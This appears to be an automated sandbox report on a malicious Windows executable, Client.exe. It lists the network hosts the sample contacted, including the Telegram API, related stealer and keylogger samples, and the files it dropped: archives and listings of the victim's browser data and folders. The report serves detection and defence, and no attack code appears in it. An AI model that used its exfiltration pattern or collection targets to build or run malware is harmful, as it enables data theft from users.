                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  149.154.167.220
                                  api.telegram.orgUnited Kingdom
                                  62041TELEGRAMRUtrue
                                  104.16.185.241
                                  icanhazip.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  172.67.196.114
                                  api.mylnikov.orgUnited States
                                  13335CLOUDFLARENETUSfalse
                                  IP
                                  127.0.0.1
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1501596
                                  Start date and time:2024-08-30 07:13:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 8s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:14
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Client.exe
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.evad.winEXE@17/139@4/4
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 122
                                  • Number of non-executed functions: 9
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  TimeTypeDescription
                                  01:14:08API Interceptor10302357x Sleep call for process: Client.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  149.154.167.220i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    Detailed Itinerary.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                        IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                          Nettably.exeGet hashmaliciousSnake KeyloggerBrowse
                                            Autofill Manufacturing Sdn Bhd 28-08-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                                SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exeGet hashmaliciousAgentTeslaBrowse
                                                  172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      104.16.185.241SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • icanhazip.com/
                                                      22.08.2024.exeGet hashmaliciousXmrigBrowse
                                                      • icanhazip.com/
                                                      vYz1Z2heor.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • icanhazip.com/
                                                      WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                      • icanhazip.com/
                                                      PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                      • icanhazip.com/
                                                      eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • icanhazip.com/
                                                      5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • icanhazip.com/
                                                      viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • icanhazip.com/
                                                      down.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • icanhazip.com/
                                                      7Y18r(198).exeGet hashmaliciousUpatreBrowse
                                                      • icanhazip.com/
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      api.mylnikov.orgvYz1Z2heor.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 172.67.196.114
                                                      WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                      • 104.21.44.66
                                                      PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                      • 104.21.44.66
                                                      eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 172.67.196.114
                                                      83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                      • 104.21.44.66
                                                      viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 104.21.44.66
                                                      LisectAVT_2403002B_4.exeGet hashmaliciousAsyncRAT, Neshta, StormKitty, WorldWind StealerBrowse
                                                      • 172.67.196.114
                                                      2U1S7Ab7YU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 172.67.196.114
                                                      xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                                      • 172.67.196.114
                                                      Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                                                      • 104.21.44.66
                                                      api.telegram.orgi3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 149.154.167.220
                                                      Detailed Itinerary.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                      • 149.154.167.220
                                                      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                                      • 149.154.167.220
                                                      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                                      • 149.154.167.220
                                                      Nettably.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Autofill Manufacturing Sdn Bhd 28-08-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 149.154.167.220
                                                      172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      QUOTATION_AUGQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      icanhazip.comSecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 104.16.185.241
                                                      22.08.2024.exeGet hashmaliciousXmrigBrowse
                                                      • 104.16.185.241
                                                      vYz1Z2heor.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 104.16.185.241
                                                      4b27fd5c70588d922a25f658f35d5c5d3e0085ba88d9bb9b25746c52b2b58e59_dump.exeGet hashmaliciousPureLog Stealer, SmokeLoader, TrojanRansom, zgRATBrowse
                                                      • 104.16.184.241
                                                      WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                      • 104.16.185.241
                                                      PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                      • 104.16.185.241
                                                      eEo6DAcnnx.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 104.16.185.241
                                                      83MZfLKh7D.exeGet hashmaliciousAsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLineBrowse
                                                      • 104.16.184.241
                                                      5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 104.16.185.241
                                                      Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 104.16.184.241
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TELEGRAMRUi3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 149.154.167.220
                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.99
                                                      Detailed Itinerary.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                      • 149.154.167.220
                                                      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                                      • 149.154.167.220
                                                      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                                      • 149.154.167.220
                                                      Nettably.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Autofill Manufacturing Sdn Bhd 28-08-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      8468281651.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 149.154.167.220
                                                      172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      DPPLYAD_12872 PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 23.227.38.74
                                                      https://eu-central-1.protection.sophos.com/?d=manychat.com&u=aHR0cHM6Ly9teS5tYW55Y2hhdC5jb20vcj9hY3Q9YjFkMWQwZDkyMDBkMzg2OGQxODUzY2NhYTk0Y2MxYmQmdT03ODg3NjgyNjIxMzQyNDMwJnA9MTAzMTAzNDUyNjg5OTI1Jmg9YTM4ZGRlMzNiMCZmYmNsaWQ9SXdaWGgwYmdOaFpXMENNVEFBQVIyNTVGWGl1MGk2VnFpR29zYktwampSVVgxQllIR2VXMjIzY0VsdzhQV1JxQkljdzFwOEtxQ3QydHNfYWVtX3djeUE3ZklHUmc5anZ3elZEVUZnc1E=&p=m&i=NjM1OGY5Yjk1Yzc0NzYwZmVkZjg4ODBh&t=UnJja2pSclhrTCtBamxpVW5SbExkeEY5Y3JMRXJReFA1MHNjMk83N01UTT0=&h=ac3121ecdd334a8eb27b9efa20223e6a&s=AVNPUEhUT0NFTkNSWVBUSVYt5nkMY7lrXten-tMtQEoHjKHanPDgFGYEyZWMpkBETxK29AsSDujuoNOgxyOGay3pj-cHDVi7N9Bi-dbvWmnMoslvZEuKFbMo_q4CIRO7yQGet hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                      • 104.26.8.59
                                                      33601ca.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.35.232
                                                      35b0000.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.180.170
                                                      33601ca.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.35.232
                                                      35b0000.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.35.232
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      https://www.bettercaremarket.com.au/pill-bottle-opener-with-magnifier-aidapt.html?comet_source=google&comet_network=x&comet_campaign=20867905123&comet_ad_group=&comet_ad_id=&comet_keyword=&comet_type=smart&gad_source=1&gclid=EAIaIQobChMIqcj6sY-ZhwMV5tgWBR0YswpVEAQYASABEgJi9fD_BwEGet hashmaliciousUnknownBrowse
                                                      • 104.21.37.20
                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      DPPLYAD_12872 PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 23.227.38.74
                                                      https://eu-central-1.protection.sophos.com/?d=manychat.com&u=aHR0cHM6Ly9teS5tYW55Y2hhdC5jb20vcj9hY3Q9YjFkMWQwZDkyMDBkMzg2OGQxODUzY2NhYTk0Y2MxYmQmdT03ODg3NjgyNjIxMzQyNDMwJnA9MTAzMTAzNDUyNjg5OTI1Jmg9YTM4ZGRlMzNiMCZmYmNsaWQ9SXdaWGgwYmdOaFpXMENNVEFBQVIyNTVGWGl1MGk2VnFpR29zYktwampSVVgxQllIR2VXMjIzY0VsdzhQV1JxQkljdzFwOEtxQ3QydHNfYWVtX3djeUE3ZklHUmc5anZ3elZEVUZnc1E=&p=m&i=NjM1OGY5Yjk1Yzc0NzYwZmVkZjg4ODBh&t=UnJja2pSclhrTCtBamxpVW5SbExkeEY5Y3JMRXJReFA1MHNjMk83N01UTT0=&h=ac3121ecdd334a8eb27b9efa20223e6a&s=AVNPUEhUT0NFTkNSWVBUSVYt5nkMY7lrXten-tMtQEoHjKHanPDgFGYEyZWMpkBETxK29AsSDujuoNOgxyOGay3pj-cHDVi7N9Bi-dbvWmnMoslvZEuKFbMo_q4CIRO7yQGet hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                                      • 104.26.8.59
                                                      33601ca.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.35.232
                                                      35b0000.exeGet hashmaliciousUnknownBrowse
                                                      • 172.67.180.170
                                                      33601ca.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.35.232
                                                      35b0000.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.35.232
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      https://www.bettercaremarket.com.au/pill-bottle-opener-with-magnifier-aidapt.html?comet_source=google&comet_network=x&comet_campaign=20867905123&comet_ad_group=&comet_ad_id=&comet_keyword=&comet_type=smart&gad_source=1&gclid=EAIaIQobChMIqcj6sY-ZhwMV5tgWBR0YswpVEAQYASABEgJi9fD_BwEGet hashmaliciousUnknownBrowse
                                                      • 104.21.37.20
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0ei3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://interface-git-main-uniswap.vercel.app/Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://metamasskluginn.blogspot.cz/Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://kfkkfd.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://pub-83f34dc51f3647dfa8d7b2730955fd48.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://taps.kraftonevent.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      https://attsecure529.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://lloydschatonline.com/Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://bt-109929.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      • 172.67.196.114
                                                      No context
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                      Category:modified
                                                      Size (bytes):187017
                                                      Entropy (8bit):7.9205382963871225
                                                      Encrypted:false
                                                      SSDEEP:3072:fjEjjBk0HedjSGj3ZjwjfhwU7Ktjq6jzijTj72upltjpSmcvQIxaxsudRUIkY06U:L+GBpaeHsf79DIUxsofkY06U
                                                      MD5:58F1D4E4CEF5FBADB79282B64BDB3C2E
                                                      SHA1:D2DADF38ABD3F5F81F972B27947AFE730B94E260
                                                      SHA-256:C34640F6CC1C9C84BCDB87DBDDF9EFB1C9FC883BD8BB7A4F2620D4692CE9E60B
                                                      SHA-512:50DC0B6BEE4E859D1E3A38059D1FD39D9EB3769C0BD40944B5650060E74B3A41C3B6EE588CF32EBAABCDC0BB85ACABFA7CABA7A4BF0C2C2C8861178F522A75FD
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:PK........j0.Y................Browsers\Edge\PK........j0.Y................Browsers\Google\PK...........YQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK...........Y...r...1.......Directories\Desktop.txteS...0.<...J/....R..Z.....E.=..k........!no..u8|~l....I.a..eM.2....ng."DO.5.2Q..#..,.E.j.6...`Z.%......2".+.....'..t..G?.u.SEc[...M#E....H1..~.D.l.f+h...O.8N.Ib.y.e......W&j...Wg...q....Y.JZP+..*U;...YC.tX......./........Ri5.....r.K.].}$....^.MH...g.C.J.1.e~xS.T...5....W*.....F.}a..i..,.....Iwn.;j...N..s.~ .-..$...C].y|.+@ka\...>X..'.>.........>..06......PK...........Y.u.............Directories\Documents.txtmS.r.0.<...C..K.@.$.yH......[...v*..[(..&..=...'.O.K{..o.O^.QsP.V."RT$(....0{...."ScM...b|G.4/E5!/....i._..BQ.`..K...5U.'~.>.R*.......<..$01..e1......TH...'.?\.J..q.q.........*..*..q.Wc.=..f.+j3..5.6......d;7.....~w.xw...[...........g.7.=y.h..O.W@..5m?..<.."De...$......t+...+.f+._......)
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):105
                                                      Entropy (8bit):3.8863455911790052
                                                      Encrypted:false
                                                      SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                      MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                      SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                      SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                      SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1073
                                                      Entropy (8bit):5.2100238313214735
                                                      Encrypted:false
                                                      SSDEEP:24:gYtDJuO+vGxyYP9aNk2idai+BANG9FpPObLBvdyZKk74:pDJQOxy0Y22idaisAg9FpPObLBvdU/M
                                                      MD5:5281F50EDB2EC4EA364EE301D6E47FC0
                                                      SHA1:B40B45EBFF1FF7253624F4226ABA91151A65F192
                                                      SHA-256:1E4DAEC943855870E6B1AFF37809CE169AD6CA56312B9E6E5BF3FC05B697828B
                                                      SHA-512:F6E682F591BE2FBC18AEE0EE7E67E5B8B0EAB1AC4D6FB01C428C899B9064862169995600169A2B22B75F7987AB2FEBE973A190AEADF8F5BC11522A493DC2487F
                                                      Malicious:false
                                                      Preview:Desktop\...EEGWXUHVUG\...EFOYFBOLXA\...EOWRVPQCCS\...EWZCVGNOWT\...IPKGELNTQY\....BNAGMGSPLO.mp3....GAOBCVIQIJ.pdf....IPKGELNTQY.docx....LSBIHQFDVT.xlsx....QCFWYSKMHA.jpg....SUAVTZKNFL.png...JDDHMPCDUJ\...LSBIHQFDVT\....BNAGMGSPLO.pdf....DUUDTUBZFW.png....EFOYFBOLXA.jpg....EWZCVGNOWT.mp3....LSBIHQFDVT.docx....QCFWYSKMHA.xlsx...NEBFQQYWPS\....BJZFPPWAPT.mp3....BNAGMGSPLO.jpg....GAOBCVIQIJ.xlsx....NEBFQQYWPS.docx....NVWZAPQSQL.png....PWCCAWLGRE.pdf...NWCXBPIUYI\...QCFWYSKMHA\...QNCYCDFIJJ\...SFPUSAFIOL\....GAOBCVIQIJ.mp3....IPKGELNTQY.xlsx....LSBIHQFDVT.jpg....NEBFQQYWPS.pdf....SFPUSAFIOL.docx....ZQIXMVQGAH.png...BJZFPPWAPT.mp3...BNAGMGSPLO.jpg...BNAGMGSPLO.mp3...BNAGMGSPLO.pdf...Client.exe...desktop.ini...DUUDTUBZFW.png...EFOYFBOLXA.jpg...EWZCVGNOWT.mp3...Excel.lnk...GAOBCVIQIJ.mp3...GAOBCVIQIJ.pdf...GAOBCVIQIJ.xlsx...IPKGELNTQY.docx...IPKGELNTQY.xlsx...LSBIHQFDVT.docx...LSBIHQFDVT.jpg...LSBIHQFDVT.xlsx...NEBFQQYWPS.docx...NEBFQQYWPS.pdf...NVWZAPQSQL.png...PWCCAWLGRE.pdf...QCFWYSKMHA.jp
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1202
                                                      Entropy (8bit):5.326822521599894
                                                      Encrypted:false
                                                      SSDEEP:24:ZtDJuO+vGx1xrqEEMYP9aNk2idaiENG9abLBvdyZKk74:rDJQOx1BqEEM0Y22idaiEg9abLBvdU/M
                                                      MD5:96ABD2B6B876FFB6C77B3043DD8445E0
                                                      SHA1:A2B45D2D6D22CE93705F2239462ED517B1D9E1E5
                                                      SHA-256:A8A730AA49C94D038E19047D417D9339A18E491B5E4B400E2D59D26236226EC5
                                                      SHA-512:CFD2B464DE33EE3D36301A2A69562AD4C24C31A4F3F31B0DBB7693E487E4791EB4CAF85A3B1D7CAD179E5B4337CBC5AE1EA100762FE7FEE7D99890C38433DE78
                                                      Malicious:false
                                                      Preview:Documents\...EEGWXUHVUG\...EFOYFBOLXA\...EOWRVPQCCS\...EWZCVGNOWT\...IPKGELNTQY\....BNAGMGSPLO.mp3....GAOBCVIQIJ.pdf....IPKGELNTQY.docx....LSBIHQFDVT.xlsx....QCFWYSKMHA.jpg....SUAVTZKNFL.png...JDDHMPCDUJ\...LSBIHQFDVT\....BNAGMGSPLO.pdf....DUUDTUBZFW.png....EFOYFBOLXA.jpg....EWZCVGNOWT.mp3....LSBIHQFDVT.docx....QCFWYSKMHA.xlsx...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NEBFQQYWPS\....BJZFPPWAPT.mp3....BNAGMGSPLO.jpg....GAOBCVIQIJ.xlsx....NEBFQQYWPS.docx....NVWZAPQSQL.png....PWCCAWLGRE.pdf...NWCXBPIUYI\...QCFWYSKMHA\...QNCYCDFIJJ\...SFPUSAFIOL\....GAOBCVIQIJ.mp3....IPKGELNTQY.xlsx....LSBIHQFDVT.jpg....NEBFQQYWPS.pdf....SFPUSAFIOL.docx....ZQIXMVQGAH.png...BJZFPPWAPT.mp3...BNAGMGSPLO.jpg...BNAGMGSPLO.mp3...BNAGMGSPLO.pdf...desktop.ini...DUUDTUBZFW.png...EFOYFBOLXA.jpg...EWZCVGNOWT.mp3...GAOBCVIQIJ.mp3...GAOBCVIQIJ.pdf...GAOBCVIQIJ.xlsx...IPKGELNTQY.docx...IPKGELNTQY.xlsx...LSBIHQ
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):442
                                                      Entropy (8bit):5.243523943620461
                                                      Encrypted:false
                                                      SSDEEP:12:ajQBLKpjGrZH09n/zHIUemBvdM7LFKk74:aEENG9abLBvdyZKk74
                                                      MD5:5F4FE4F68443B6CDFA5CC4D27841563D
                                                      SHA1:DF1FB6DDC2252A37FFF9B045EB4FC8112B9C2CA2
                                                      SHA-256:4C3B6D316D3324CDDFD142B87DA7C382B3D620A2B604BC9BD3D411A98394E050
                                                      SHA-512:CAD09F4C8246CAA6DF13BE08E26419DE4B33FB579E1B00B777F004EFDEC811EAC9023996EEB9F21006CF1A8E1BAECE10F1B4FE5695CFA6D1B12668A45AC0BF48
                                                      Malicious:false
                                                      Preview:Downloads\...BJZFPPWAPT.mp3...BNAGMGSPLO.jpg...BNAGMGSPLO.mp3...BNAGMGSPLO.pdf...desktop.ini...DUUDTUBZFW.png...EFOYFBOLXA.jpg...EWZCVGNOWT.mp3...GAOBCVIQIJ.mp3...GAOBCVIQIJ.pdf...GAOBCVIQIJ.xlsx...IPKGELNTQY.docx...IPKGELNTQY.xlsx...LSBIHQFDVT.docx...LSBIHQFDVT.jpg...LSBIHQFDVT.xlsx...NEBFQQYWPS.docx...NEBFQQYWPS.pdf...NVWZAPQSQL.png...PWCCAWLGRE.pdf...QCFWYSKMHA.jpg...QCFWYSKMHA.xlsx...SFPUSAFIOL.docx...SUAVTZKNFL.png...ZQIXMVQGAH.png..
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):25
                                                      Entropy (8bit):4.023465189601646
                                                      Encrypted:false
                                                      SSDEEP:3:1hiR8LKB:14R8LKB
                                                      MD5:966247EB3EE749E21597D73C4176BD52
                                                      SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                      SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                      SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                      Malicious:false
                                                      Preview:OneDrive\...desktop.ini..
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):88
                                                      Entropy (8bit):4.450045114302317
                                                      Encrypted:false
                                                      SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                      MD5:D430E8A326E3D75F5E49C40C111646E7
                                                      SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                      SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                      SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                      Malicious:false
                                                      Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):24
                                                      Entropy (8bit):4.053508854797679
                                                      Encrypted:false
                                                      SSDEEP:3:jgBLKB:j4LKB
                                                      MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                      SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                      SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                      SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                      Malicious:false
                                                      Preview:Startup\...desktop.ini..
                                                      Process:C:\Users\user\Desktop\Client.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4381
                                                      Entropy (8bit):5.1399177275372905
                                                      Encrypted:false
                                                      SSDEEP:96:4R9CK/6f8gtc0SyrLscx6Mj0t1fQ7WVwtLxGIGVkL1Ro7p9U7lJ3LH:olMPsGPoDQiK99Kc
                                                      MD5:29E9ACD31D1172C46861C9C76E62A78F
                                                      SHA1:E3ECB8D0B0619CCE6C4B24B0AD6C1EA6F0A69225
